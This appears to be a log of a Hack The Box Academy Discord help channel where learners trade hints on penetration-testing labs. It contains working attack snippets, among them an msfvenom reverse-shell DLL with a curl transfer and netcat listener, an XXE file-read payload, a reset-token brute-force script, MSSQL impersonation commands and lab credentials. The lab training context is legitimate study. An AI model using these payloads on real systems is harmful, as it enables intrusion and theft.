I just reset the machines yea all 3 ways dont seem to do what they should be doing. metasploit gets the file uploaded but it doesnt seem to start on the listener. the war payload created with msfvenom wont call back and the webshell uploaded gives a 404 error

done using wfuzz

ok i seem to have gotten it now. used hacktricks version of the webshell

try resetting the machine and vpn

hello

I'm in the Shells & Payloads PHP Web Shells section and every time I upload the file using Burpsuite and then navigate to the /images/vendor/connect.php on the site, I get the error of Not Found The requested URL /images/vendor/connect.php was not found on this server. Has anyone else run into this before? I made sure to use Burpsuite to change the file type from application/x-php to image/gif.

so do you need help with something?

first did the upload success? and did you named your web shell connect.php? the /images/vendor/ is the upload directory so your shell should be in there and if directory listing is enable you can just see your shell

Anyone got any good resources for learning assembly? Don’t mind reading books.

hi

try this site https://ost2.fyi

just finished AD skills assessment 1, omg

i need a few shots of vodka

sweating....

has anyone been able to install and run pypykatz? It gives me errors

and it's not on the pwnbox either

strong suggestion: dont attempt the AD skills assessments unless you really know the pivoting module work

Shit wrong channel.

ok I solved the pypykatz issue

Password Attacks/Network Services - I am joining the share, but cannot dir or ls to see whats in the directory...could someone lend me a hint?

as it says access denied

yea

haha

are you asking the list of possiblities of why you are denied of access?

haha

your pass may wrong

your user may wrong

comes to mind at first

yea i thought that too, but crackmap stops when it finds that user...

unless i just remove it from list

because that have valid user so you may want to remove that

ok let me try that then

and the reason for this is because all user are on the same box but each user shouldn't have assess to (i think) almost service but still they do

so that is a valid user but hint just not the right one for smb

i see

if that the case, you can also use "--continue-on-success" flag. So, it doesnt stop

Could someone help me with Password Attacks Hard Lab? I tried brute forcing Johanna's password, but cannot get anything. I used mut.lists from the resources .

Which service did you try to bruteforce then? Try || winrm ||

Yes i did and i got none been resetting the target twice and nothing unfortunately..

DM

got rickrolled by htb

hi

I need help in the metasploit framwork module, section payloads. I'm using the exploit0 exploit/linux/http/apache_druid_js_rce, changed rhosts to my target ip, and lhost to my ip, but its not running. I watched a tutorial online and he did nothing different than me, but still obtained a reverse shell. Is there something i'm missing?

ok?

nevermind, I just realized I was using the wrong ip address face palm

ok

Did you configure the SRVPORT to the correct port?

i would like to train IoT Cyber Security. Any tipps for specific modules or even machines?

u guys look like bots, cuz u type like one. Lol

Hi I'm stuck on FOOTPRINTING LAB-MEDIUM: I enumerated UDP service and found creds for user alex, i logged into the server using this name and creds via RDP, but I found creds for user sa, i tried to log into the mssql server managament studio app, but I receive an error , I tried login into smb service using username alex and creds and found sa creds, what should I try next?

Your user has no rights to access the database.
You have to log in with another Windows user (password you already have) via RDP on the client.

thanks for the help im gonna try

yep try that with ffuf

is this just for talking random stuff?

in the modules

Yes, this is for discussion about modules in the academy.

sup

i need help with hack the box

if that is ok

Unfortunately, we do not have a crystal ball and cannot see into the future. So if you tell us what you need help with, I'm sure you'll get some help. 😉

to get started

idk how

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

ok

nice images

on enterprise "Introduction to Networking > Networking Models"

yes

Thats academy

not enterprise 🤷‍♂️
Idk where to talk about enterprise

https://enterprise.hackthebox.com

Hello guys need a nudge on "BROKEN AUTHENTICATION-Brute Forcing Cookies"

best bet is to reach out to support pload

In the Skills assessment of pivoting and tunneling, what am I expected to do for question 5? Load kiwi or something like that?

but could be DNS as always..

DNS strikes again, i just moved on in the module. I'll check back when im done

Like loads of things are fucky

All the tables are whack

Wouldn't expect this for how much you pay for enterprise
HTB cashgrab moment

Hi all,
I'm in the Attacking Common Services module, Attacking Common Services - Hard section. ||I have managed to login with SMB and get access to the IT folder with the three users and their .txt files. Then using the creds.txt file to login to the MSSQL service and via RDP as user fiona. I also managed to find the two users I can impersonate by logging into the MSSQL database. Problem is that neither john or simon gives me admin privilges, which is very confusing considering the hint in question 3.|| Can i get a hint on how to proceed? 🙏

dunno, on the normal academy it loads just fine

Gm guys, still stuck on the 4th question as i was yesterday. I'm in "INTRODUCTION TO WINDOWS COMMAND LINE" ; Section "Skill assessment" question 4 "User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."

I have cd into on of the dir, all the other dir have the same flag.txt, but I'm not sure which one to open and it feels kinda overkill to cd into ea and everyone to find the right flag. Since there is multiple dir with the same '0 flag.txt'

And it seems there is no ASCII text in either of those i try to look for since there is "0 bytes" in the files

I haven't done the module, but did they cover the 'tree' command?

Yes they did, i tried the tree command but it just spits out to much information that it seems overwhelming

Lemme get a sc on that

Need to scroll for like 5-7 seconds to get to the bottom

That is how big the folders are in \Documents

Ah yeah, it looks like it's intentionally set up, to make you use tree.

As mentioned before, every dir has a another dir that has another dir

that has flag.txt

This is from the top, you need to scroll a bit to get to the bottom

Ah. Did it cover powershell with gci?

That would probably be better, for this.

I have tried powershell commands, get-content or get childitem i even looked into the hive and it spewed out the same information

gci no i do not think so...

the module is so big

get-content i had permission denied i even tried an elevated powershell but i hade permission denied

they did cover sls but I'm not sure what string to search for...

I even tried that

I have tried every command i can think of in CMD or powershell

I'd look to see if there's any section that covered Get-ChildItem (gci), which then was able to look at length.

Alright ill check into it

check the sections again

Is there a command where i can read all the files within a dir?

DM me

Can you be a little more specific? I feel like I've read everything

anyone?

the hint might feel confusing but it is actually a really good hint

the other hint might move forward

dont go back

step by step every door opens a new one

Ok, but can you at least tell me if I'm on the right track with MSSQL?

not sure be spesific

what do you mean?

have you found the answer to the question 3?

Yes, ||It's John||, but does not provide admin privilege...

Like the question suggest

I am telling you to move forward. Think about what might be the reason you have access to mssql

||```┌──(kali㉿kali)-[~/HTB/AttackingCommonServices]
└─$ sqsh -S 10.129.203.10 -U .\fiona -P '48Ns72!bns74@S84NNNSl' -h
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> USE master
2> go
1> EXECUTE AS LOGIN = 'john'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go

    john
                                                                                                                          
       0

1> EXECUTE AS LOGIN = 'simon'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go

    simon   
                                                                                                                         
       0

its in the sections

read the sections again

you are missing sth

Ok, I will forget MSSQL for now and try something else... Thanks

you can use also the SQL management studio on the target

Guys any hint on "BROKEN AUTHENTICATION-Brute Forcing Cookies" - this module drives me to despair!

Read the Hint
|| This web server doesn't trust your IP! ||

Where exactly are you stuck?

Tried that too, but I get a connection issue...

maybe you need to tweak a setting before you can access the instance

Tamper the session cookie for the application at subdirectory /question1/ to give yourself access as a super user. What is the flag?

Yes, this question is unfortunate. You have to add the role super in the cookie

weird question - for the AD enumeration skills assessment 2 when I use crackmapexec smb --users to enumerate all the usernames i get all the various accounts such as INLANEFREIGHT.LOCAL\SX681, INLANEFREIGHT.LOCAL\MC188 etc etc. but when I enumerate with windapsearch (and kerbrute using the jsmith.txt) i get users like cn: Annie Vazquez
userPrincipalName: avazquez@inlanefreight.local

why is this?

I'm using this || /CommonAdminBase64.txt|| wordlist but not sure that I set up my intruder correctly

You don't need a wordlist at all.
Adjust your script so that it recalculates the cookie for you.
|| username: htbuser
role: super
time: unixtime ||

got it dude:)

awesome!

thank you!

and then when i run enum4linux-ng i get a mix of both 😛

username: YL119
name: Jessica Ramsey
acb: '0x00000210'
description: (null)

why some tools have username as YL119 and others have it as jramsey@inlanefreight.local

Hello, I am currently working on the "Password Attacks" module, but i got stuck on this question "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."

I ran crackmapexec and found the supposed user and password ||(john:november)||, but whenever i run evil-winrm i get this error Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error

Can anyboby help me?

yeah, sometimes evil-winrm is playing games

using web proxies showcases burp and zap

do you know what else could i use cuz i tried searching for other tools but i couldn't really find any

maybe purge and install the tool again?

ok

will try that

thx

Hi everyone! Can someone put me in the right direction on the Password Attack module (Network Services). The last guestion :Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer. I can login to the SMB service with the user J**** and his password, but can not find the flag. The only shown readable share for me is IPC$. And when I do a "dir" on it there is nothing there. (smb: > dir
NT_STATUS_INVALID_INFO_CLASS listing * ) I do not know what am I missing or what am I dong wrong. Thank you

Someone has finished Active Directory Attacks module ? I need help on skills assessment Part II please

Quick questions on File Upload Assessment

I have found the bypasses and I'm able to use ||XXE to pull information /etc/password and sourcecode etc.|| It reads that I should be able to find the flag in the root directory "/" but when doing so it comes up blank.

I'm sure its slight misunderstanding on my part but would like small clarification / hint

Payload: ||<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:////"> ]>

<svg>&xxe;</svg> have also tried /flag.txt /flag etc||

@bronze sequoia can't help but notice you been spamming a lot of random stuff through quite a lot of channel, do you need help with something?

that is a valid user (not for the smb question) but still a valid user so you may want to remove that due to spoiler

also hint if you got access to target machine get all of the user on that machine and use it as a username wordlist if a user get a hit on smb but you get nothing when login like this just remove that user out of your wordlist and continued

sure what's the issue?

I Was unable to access with rdp but I found it, thanks

yep for this you have to get RCE so the flag is there just isn't named flag.txt

and hint ||source code||

Oh was not expecting to have to get RCE lol, let me figure this out ty for slight hint

Thx, I'll try that

Hello guys, i am stuck at https://academy.hackthebox.com/module/75/section/764
Common Web Vulnerabilities

To which of the above categories does public vulnerability 'CVE-2014-6271' belongs to?

I was searching all over the internet for description and nothing that i imputed didnt work.
So i got stuck here, that is the final question that i didnt answer

Hi, I'm stuck at https://academy.hackthebox.com/module/80/section/837 question No. 2 . I can't get a username and password match. This is my script: `

#!/bin/python3

import sys
import requests
import os.path

# define target url, change as needed
url = "http://138.68.164.196:32364/question2/"

# define a fake headers to present ourself as Chromium browser, change if needed
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36",
    "X-Forwarded-For": "127.0.0.1"
}

# define the string expected if valid account has been found. our basic PHP example replies with Welcome in case of success

valid = "Welcome"

...SNIP...

the python3 part from the example is the right path but you can just do it in burp

Linux Privilege escalation, Special Permissions. Not really sure what the questions are asking for. Little help please.

what's wrong with the script?

no idea

from what i can tell you only put the part that you set some variable and nothing more

how would i go about doing it in burp?

there is no code about seeding the request and for debugging you can just route it through proxy

change the header in the request in to the example python code

the answer for that question is 1 of the 4 given option on the section

but then i get rate limited

ive spent all day working on the active directory enumeration skills assessments LOL

ive almost finished the 2nd one

this part isn't about brute forcing

about what then

head hurting, will sleep now

@rustic sage Hi

Hi

like the question said one of the method showed and the section didn't show any brute forcing

just bypass method

hmm

the python code is just changing 2 line in the header you can just do that in burp and get the flag

i found it, thank you for the little push !

oooooh think i get it

What did I do wrong, lol

For SQL Injection Fundamentals - SQL Operators I am at a loss why this is not working. I even pulled the entire table and used grep to see if i was wrong and I keep getting ||322||

In the 'titles' table, what is the number of records WHERE the employee number is greater than 10000 OR their title does NOT contain 'engineer'?

||```rust
MariaDB [employees]> SELECT COUNT() FROM titles WHERE emp_no > 100000 OR title NOT LIKE '%engineer%';
+----------+
| COUNT() |
+----------+
| 322 |
+----------+
1 row in set (0.137 sec)

spoiler if you do offshore the thing that is going to be hurting isn't going to be your head 🤣

got it... ty

thought i had to brute force

oh so that's what the last part of your code are

The computer will be hurting when I throw it out the window

try without the COUNT thing and replace the ||OR|| with ||AND||

I'm a bit off doing offshore I think

Okay so I feel like a big dunce, I have found ||upload.php and I see how the files are uploaded and where they are placed, but I'm not understanding how I get RCE from here unless I've just utterly failed on my recon of the bypasses. /uploads/230220_flag is my understanding of accessing the flag upload?||

that's where your payload is uploaded not the flag also the upload directory is wrong

The directory is || /user_feedback_submissions/||

still missing 1 more thing but that's the right part of it

|| /user_feedback_submissions/230220_penguins.svg -------based off of penguins.svg original file name||

Really makes me quesiton my ability here 😦

the struggle is real

I had too many zeros

I'm stuck on the hard lab of the module network enumeration with nmap. I believe I know what I'm looking for but honestly I feel completely clueless as the flag isn't presented from that service

Find the valid username for the web application based at subdirectory /question2/. this question?

yes

1 sec I'll check my notes

is anyone else having issues with host 3 in the shells and payloads live engagement?

What do you do with that?
show me the command

used burp intruder to enumerate the usernames and the other params but no success

using the wordlist for top-usernames-short.txt

Feel free to DM - let me know what you know/did already; where you stuck

did you check each response?

yeah ~ "Invalid creds"

Let's try to do it with wfuzz as shown at this part of the module

I bet you will get the flag in 2 minutes 🙂

.

if something goes wrong send me your command and I'll fix your mistakes

Thank you. I missed that I would need to change the name of the shell to connect.php. I should have realized that as that is where I was trying to navigate to.

Because it has javascript and deobfuscation in its name, I was scared to start that module until today and finished it within an hour or so. OMG, the easiest module ever. hahaha

anyone available to help me with the last question on the shells and payloads live engagement?

hlo guys

if you just write it down it would be alot easier

heyy

||Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt||

everything in the hints and enumeration were screaming to use the eternalblue but when running it i got consistent failures

can you change my nickname pls

yeah that exploit only work like half of the time for me if i'm lucky but instead of if that exploit use the one that only run 1 command ||ms17_010_command|| and just get the flag

ill try that

and also you can confirm exploit like this with nmap script or scans in metasploit and when you confirm the vuln and an exploit don't work then all you'll need to do is find a different one

well i did try the psexec version but there were no shares available to grab hold of

i have to reset the machine just waiting for it

that worked. thank you. this capstone was a nightmare.

before you got hold of me i was trying to use antak and lolbas to upload the file to the vm machine but i couldn't get an upload server going on it. you saved me probably 2 hours of troubleshooting for this on

Looking up ther error says "location" should be inside of server which I think it is? Have also tried putting in server / etc....Unsure why this isnt working.

    worker_connections  1024;
}


http {
    include       mime.types;
    default_type  application/octet-stream;

upstream tomcats {
        server <IP>:<PORT>;
        keepalive 10;
        }
server {
        listen 8080;
        location / {
                ajp_keep_conn on;
                ajp_pass tomcats;
        }
}

Nginx Reverse Proxy & AJP

nginx: [emerg] "location" directive is not allowed here in /etc/nginx/conf/nginx.conf:66

for learning, whats better: hack the box or offensive security, if we just look at the effectiveness and not the price

Htb

why and in what aspects?

You can ask questions

and get squestions answered

Yoyoyo new GOAT in the chats

Jk

No one gonnna answr🐿

cant you do that on other platforms too

and, objectively, an offsec certificate is an important thing for a job

Then u should for CEH

Not on offsec yo ucant

Hmm

ceh can be done after some offsec certificate

i just dont understand if the beginner course is worth 800 bucks or not

But ceh is basic

Some time they run scholarships

spend $8 a month and see if HTB is the right fit

In Port Forwarding with Windows Netsh of PIVOTING, TUNNELING AND PORT FORWARDING I'm having some issues with the netsh command:
||C:\Users\htb-student>netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.42.198 connectport=3389 connectaddress=172.16.5.19 The requested operation requires elevation (Run as administrator).||

Usually you can pretty much follow the modules step by step and nowhere does it mention anything about getting ||Admin rights so I'm thinking that it's an issue with my command and not a matter of privesc before running netsh. ||Is it a wrong assumption? thanks

Hi all,
I'm in the Attacking Common Services module, Attacking Common Services - Hard section. ||I have managed to login with SMB and get access to the IT folder with the three users and their .txt files. Then using the creds.txt file to login to the MSSQL service and via RDP as user fiona. I also managed to find the two users I can impersonate by logging into the MSSQL database. Problem is that neither john or simon gives me admin privilges, which is very confusing considering the hint in question 3.|| What am i missing?

why copying pasting the same thing again

Beacuse I still can't figure it out 😦

you already told me you got the answer right for the 3rd question

Yes, I had it right before i posted the first time

But i still don't have any admin rights...

which means you are trying at the wrong place

Overview ℹ️:

• In this script one can convert different type of Currencies to Indian Rupees (INR).<br>
• This Script also have a log in screen.<br>
• Person's credentials are saved in a .json file.<br>

https://github.com/Tejas1510/Hacking-Scripts

Is it through rdp then or? I'm also totally lost and my brain is really not functioning anymore xD so could you hint more specific to what service or what part we have to do 😄

Hello, I just joined HTB Academy and I found my self with an issue that my HTB viewer (web's pwnbox( starts and stops working after some seconds. I tried to find some info about it, but had no success. Sorry if I am posting this in wrong channel.

Some help at the predictable token reset please I have this script:
||```
from datetime import datetime
import pytz

now = datetime.now(pytz.timezone('GMT'))
epoch_time = int((now - datetime(1970, 1, 1, tzinfo=pytz.utc)).total_seconds() * 1000)
epoch_time_str = str(epoch_time)

print(epoch_time_str)

Which should return the time for variable now in this script:
||```
#!/usr/bin/python3

from hashlib import md5
import requests
from sys import exit
from time import time

# Change the url to your target / victim
url = "http://134.122.103.40:30363/question1/"

# To have a wide window try to bruteforce starting from 1050 seconds ago till 1050 seconds after.
# Change now and username variables as needed. IMPORTANT! the value for now has to be epoch time
# stamp in milliseconds, example 1654627487000 and not epoch timestamp, example 1654627487.

now        =  1676900794812
start_time = now - 1050
end_time   = now + 1050
fail_text  = "Wrong token"
username   = "htbadmin"

# loop from start_time to now. + 1 is needed because of how range() works
for x in range(start_time, end_time + 1):
    # get token md5
    timestamp = str(x)
    md5_token = md5((username+timestamp).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }

    print("checking {} {}".format(str(x), md5_token))

    # send the request
    res = requests.post(url, data=data)

    # response text check
    if not fail_text in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
```||

But cant get it to work, any help please ?

I'm aware thanks, would you be kind enough to give a useful hint? We are hard stuck here

Tried skimming the sections again like you said earlier... nothing 😦

you ve got too many hints next thing is the answer

maybe you should left it for couple of days and start with a fresh mind

you are missing very obvious thing

Honestly I think you are better off building your own VM using either Kali or ParrotOS. The provided Pwnbox is missing some tools anyway. You can install tools on it, but they will get wiped away when you reset the Pwnbox. I only use it if all else fails or if I need to check something really quick

also, if what is start/stopping is the VPN, you can have only one VPN connection active at any one time

I think there is a pwnbox channel if you want to go into specifics of the provided pwnbox

From no experience in IT, I have learned a shit ton from HTB. I like how they build on the basics, and incorporate stuff as you progress through the paths. The hands-on portion is EXTREMELY important for me because I learn by hands on so reading the material then doing helps you better understand it.

Run the command part on your local terminal first to verify that it works.. your last payload does not make sense

Hi, I'm stuck once again at the Broken Authentication module (https://academy.hackthebox.com/module/80/section/767) question 2. I found the params in the request but really don't know what to do with them. Could anyone give me a hint what to do with the params

Hello New to web pen-testing and was stuck on Web proxy encoding/decoding using burp suite. VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0= Trying to understand how to accomplish this with in burp suite decode. I have tired several methods with no luck.

Which encoding do you think it is?

Base 64

Can you not simply select base64 then in burp decoder?

Yes but there is flag with in it that am trying to decode " The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag. "

You have do add additional decoders after the base64 decoding - I remember that was a pain in zap, but does burp not allow you several steps?

You have to try all user names from the wordlist and pay close attention to the response. One will be different

yes it does thats were am stuck tried a few combos but have not found that combo

Try to understand the different formats, you'll find the combo then. It's about patience and understanding what the different formats look like

ok thanks

I think it's mainly ||base64 and hex|| from what I remember

I'm there a way to go throw the free machines ,
or just open any machine and go on

Hey guys

https://nohello.net

Ah...

Why is this a rule

he isn't even verify or previously ask any thing, there is no chance he need help with modules

nope the rule are at #rules

but if you need help with something just say that instead of hello

Dude , be nice
I obviously would want ask something about modules In the modules chat

Lol well this channel is for help with academy modules. If you have a question, it's much better to state your question instead of typing "hello"

Unless you're genuinely lost in the discord server which is ok. You'll have to verify to see other channels

Thank you so much
How do I get verified?

Send ++verify in the #bot-commands channel

It should send you a DM with instructions

Happy to have people like you in the server
You been really helpful !!

I try 😄

Hello, May I ask help for Pass the Hash Module? I successfully got David's hash but I tried to use Invoke-TheHash but it says "inlanefreight.htb\david WMI access denied on DC01"

how should I solve this issue?

MRTom is like the nicest person in the chat. Its just literally a daily issue of people coming in here, not reading the rules or how to verify or the likes, then instantly treating this chat like its a general server chat, which it isnt. Popping in here just to say hi kinda mentally puts you in that camp of people.

May I have some assistance/nudge with Password Attacks - Hard Lab I opened the encrypted bitlocker .vhd file. Attempted to utilize secretsdump.py to extract hashes but receive the following error.

try copying out the files first just to be safe

anyone looking for help?

Probably a silly question. Shells & Payloads The Live Engagement am I not suppose to tunnel? The host with RDP access does not even have a browser to use

wmi isn't the only remote access possibility, try some of the others.

Receiving an Input/output error when attempting to copy the SYSTEM file to a directory outside of the mounted directory.

then something's gone wrong with your mounting/decryption

Thank you!!

Nevermind, I slammed enter multiple times and got my chisel tunnel going. Like wtf -.-

lol i was planning on trying that but i just used the rdp. the machine does have firefox. if you open up a terminal and run firefox as a command itll open it

Hi I'm working on the Documenting and Reporting module and I'm having an issue with the second question: "Steve is learning about the tool that can make logging a session easier. He messages you for help mentioning that he would like to try to split the panes vertically. What do you tell him?". I found the answer earlier in the module but I'm struggling to format it correctly. If anyone could help me out a bit that would be great (:

hi

I am already committed with my tunnels. Good practice anyway

That did it. Thank you @thorn urchin !

Let’s keep this channel on topic please

👍

woohooo just finishied both skills assessments for AD enumeration

the last few questions were actually the easiest lol

absolutely wild module

anyone have issues with password attacks module. section network services with RDP attack? it either connection errors or when it does start connection overloads even if setting the -t 1

Did you keypass2john?

I still have some problem that says

😦

nvm i have found the david dc01

Hey! Im on Password Attacks - Network Services. Can someone help me understand how to obtain the user for the services such as Winrm, rdp, etc.. I understand how to obtain the password, but not getting how to get the single user Thanks

Hi there! Does someone know what happened to CBBH and CPTS channel. I don’t see them any longer. Is it just me?

ok everyone, why when i run wpscan --url <URL> -e ap it finds 2 plugins, but if i run wpscan --url <URL> --enumerate it doesn't find plugins?

Is anyone having issues installing the latest version of pypykatz??? Install with pip or git clone ain't working for me

need to use for a module, but doing the install instructions on the github isn't working

even installed in a Venv

like i cant complete this skills assessment if I can't use this tool haha

create a new pwnbox instance and run #modules message

how long does this password mutation module take? I have been brute forcing the password for a good minute now...used the provided resources.

you get the last 2 for network services?

oh course---i dont skip haha

xD

dont over think them...very straightforward

Module: Attacking Common Services
Section: Skills Assessment - Easy

1. I've enumerated the services and found the username & password
2. I've retrieved and read || the documents in FTP ||
3. I've checked || service user privileges in MariaDB and can read/write to host || and I understand my next step is || to upload a php shell to C:\xampp\htdocs || but I am unsure as to how to craft it and how to invoke it .

A nudge or someone to DM would be a huge help

Shorten that damn list lol

that section is horribly long

also i think that is the one where you have to bruteforce another service that they don't tell you is there

yea i have two going at once...ill try shortening it haha

feel like im losing knowledge its so long haha

that section is dumb af

Check the length of your mutated list with 'wc -l <mutated-password-list> it should be around ~90k. I messed up my mutation and ended up with 180k lines.

Hint || check other discord advice but you can generally cut the first 17k lines with "sed '1, 17000d' file.txt > new_file.txt" and get a quick result ||

interesting..thanks! yea my list is 187K

That's exactly what I did, I had to go back and review my mutation process and then got the right amount. good luck!

moneh

lol

Hey. Could you help. I have a problem with Linux and VMware

Hey, in trying to set up VMware but it says Befor you can run VMware, several modules must compiled and loaded into the running kernel

Oh!

How can I help?

It don’t run properly. do you know why?

I don't know why

Okay

Maybe you could ask another person

in theory, setting up an smb server for instance, you can do both

Would you have an answer for me to?

?

I can't fully understand that question, is it during vmware's installation or some virtual machine that you are trying to install?

I’m just trying to start with hack the box. I’m running a Linux system but am trying to instal VMware

During installation

Try to paste the error message into google, and see if there are other peoples that could have experienced that

I’ve just installed stuff to. /usr/src

Okay. Thank you

Do you know a better way to set up the vpn?

For HackTheBox?

OpenVPN's binaries are usually preinstalled on Ubuntu, Kali and ParrotOS for example, which leaves the opportunity for you to only execute the command and specify the path to the VPN in order to connect

I’m in elementary OS

also, you can download ready-to-go ISOs that you can import into VMware and just boot up the machine

Okay. So is VMware an easy way to do it?

Up to you, there isn't a general easy way, just adapt over what you have

Could you find me a tutorial for doing it in Linux. I can’t find one I’ve been looking for ages?

no, this I will leave to you

Okay

Thank you

i am not able to move between the windows in tmux... i tried prefix + arrow up, arrows left...doesnt work...
i looked into the man pages and there it was described like this...i looked into the exmple_tmux.conf file but I did not get any wiser...
how should it work...? or in wich config file i do have to look?

if you are using pwnbox, it will be a bit hard to do that

no my own...

if you have created separate windows, then you must specify the window number

unless you have splitted them horizontally and/or vertically

https://www.youtube.com/watch?v=Yl7NFenTgIo

thanks will look that tutorial. before I watched one from ipsec...he did it also with the prefix + arrow

also this - https://tmuxcheatsheet.com/

thanks ;)! ctrl + b, let ctrl go and than the arrows 😉

https://www.youtube.com/watch?v=Lqehvpe_djs&t=181s

ipsec 8:43 😉

Hello and good day everyone.
Please can you guide me on which modules in academy centre around infrastructure security domain and application security domain as the names of modules don't help much. I've seen OWASP top ten but I need a more guided approach to attacking these subjects, thank you.

OWASP Top 10 is a path on the main platform (app.hackthebox.com). This path has nothing to do with the Academy.

The names of the modules in the Academy (academy.hackthebox.com) are actually self-explanatory.

On which platform are you looking for exactly what?

Thank you for your reply sir.

Ohhhh my bad.
I thought I'd seen it on HTB academy.

I'm currently on Academy sir, I'd like to study the aforementioned subjects, if you don't mind can you guide me on the modules I should study and other extra modules that might be helpful?

To be honest, almost every module deals with infrastructure or application security. It's best to go through the modules and mark the ones that interest you with a heart. Then they will appear in your ToDo list.

The titles of the modules clearly indicate what is at stake

Well thank you again for your help.

I'll do as you've said now.

Hey there, i just finished Password Attacks Lab - hard completly on my own attack machine, but i know there were some stuff and a file on the victim host. So if anyone got a solution how i can reach the same using the provided stuff on the victim machine, feel free to DM me. Thanks 🙂

Hello, i have problems spawning an instance,
its showing up and then i get a "black screen" after a few seconds

Where to go with this problem?

Anyone have any issue submitting their answer for Active Directory Enumeration & Attacks - Miscellaneous Misconfigurations question 2?
Identified user through both Kerbrute and PowerView.
Checked against ADUC to confirm Kerberos preauth is not required
User hash grabbed through both GetNPUser.py and Kerbrute
Ran hash through both hashcat and john (same result)
Apparently wrong answer. I get the same hash password as the module example. Anyone else had this issue? I've tried multiple times

I had the same issue, I changed from xfreerdp to rdesktop and it worked

wow without looking at the walkthru in the web attacks part of attacking enterprises i would NEVER have got past the verb tamping plus x-custom-ip-authorization part

File inclusion ....//....//....//need HELP

I am also having the same issue. Able to get SSH and WINRM but when it comes to RDP and SMB am stuck. I ca see the shares on SMB but cannot access. Any help?

Same here. Able to sole SSH and WINRM but got stuck in RDP and SMB. I could see the shares in SMB, but cannot access it any help?

nope

on the sql injection skill assessment (final exercise): Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.

||I bypassed auth, identified tables and columns, found that root@localhost has super_priv rights and file permissions on mariadb. I doublechecked that I'm logged in under 'root@localhost'. ||

When I try to write my webshell to the server I still get error 13: permission denied. Even though it seems like I have file permissions? Can someone give me a hint on this exercise?

hey everyone, I just finished the "Cracking Passwords with Hashcat" module and in the last question I had to manually clean the output file to find the most used password ... I would like to know how could this be done using grep (as mentioned in the hint). I tried looking only but didn't find a solution that just read the password occurrences after last colon

why do you need to write a webshell ... you are just trying to read the file only

@iron plaza Cause I dont know what the filename is, so I'd figure I'd get a webshell to figure that out? ls for instance

yea you need to list down the files in the root directory then load the file once you know the name all this through sqli

Thanks! I'll have to figure out how to list the files, but this already helps a lot as I dont have to figure out why i cant write a webshell!

actually ignore what I said ... i am trying to recall how I solved it but I am failing to remember... you may need a webshell to enumerate the directory but probably from an admin panel ... looks like i need to redo this again to jog my memory

nvm I misstyped something 🤣

That's alright, I'll just keep trying, thank you anyways for your help!

doing the attacking enterprise networks, some real brain teasers but happy to report im in.....

You need to find a directory that you do have permissions to write to.
Maybe reading a file first may help

I am taking the windows CLI exam but when I connect to the ssh it doesn't print the banner to find the next answer.
"The banner will be printed on the banner on successful login to the host via SSH."

file upload attacks is borderline annoying module...

Agreed lmao

I actually found it to be so annoying that I decided to take a break from CPTS (ok it's not entirely that modules fault but thats what out me iver the edge). Now I'm learning C# and developing a C2 lmao

Good evening friends! Who will help in the passage of the module Ausing HTTP Misconfigurations. I have a lot of things that do not work, I do everything according to the instructions.

spent the last hour and half going into the rabbithole that the hint gives you, smh

hi guys can anyone guide me with the shells and payload "the live engagement section"?

I am stuck. I upload the war file generated by msfvenom but I don't get a reverse shell

Windows Privilege Escalation
User Account Control
i tried these :
msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-port> -f dll > srrstr.dll
transfer
TARGET> curl http://<attacker-ip>:<python3-port>/srrstr.dll -O "C:\Users\<my-account>\AppData\Local\Microsoft\WindowsApps\srrstr.dll"
normal revshell (works)
ATTACKER> nc -lnvp 9999
TARGET> rundll32.exe shell32.dll,Control_RunDLL C:\Users\<my-account>\AppData\Local\Microsoft\WindowsApps\srrstr.dll
elevated revshell (nothing happens, not getting any shell)
ATTACKER> nc -lnvp 9999
TARGET> C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

//ok got it. need to signout & sign back in

Web Proxies - Skills Assessment: I am needing to capture the http response and change some things. I am needing to do this multiple times so I need to send it to the repeater. However when I hit ctrl R it just sends the request and not the response and I am unable to change it in the repeater. Any help?

Actually forgive me I completely forgot about automatic modifications...

Hello, could anybody give me the password for sam from "Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer. " from Password Mutations from Password attacks.

The mutated_passwords dictionary has 94000 passwords and i ve been running hydra with 64 threads for like 4 hours and it only did 14000

I don't know what else can i do because like this it's taking forever

remove the first ||17000|| password

I have a dream... that the password attacks module will one day get updated, so this doesn't happen 10 times each day.

I am completely stuck on the skill assessment in the shells and payloads module. I have logged into via RDP on the foothold machine from my own Kali VM. This brings me to Parrot desktop. I can see a txt with credentials, but there is no browser installed. How am I suppose to access host1 @ 8080 without a browser? I tried curl but that didn't get me anything.

Firefox

run firefox in a terminal

^

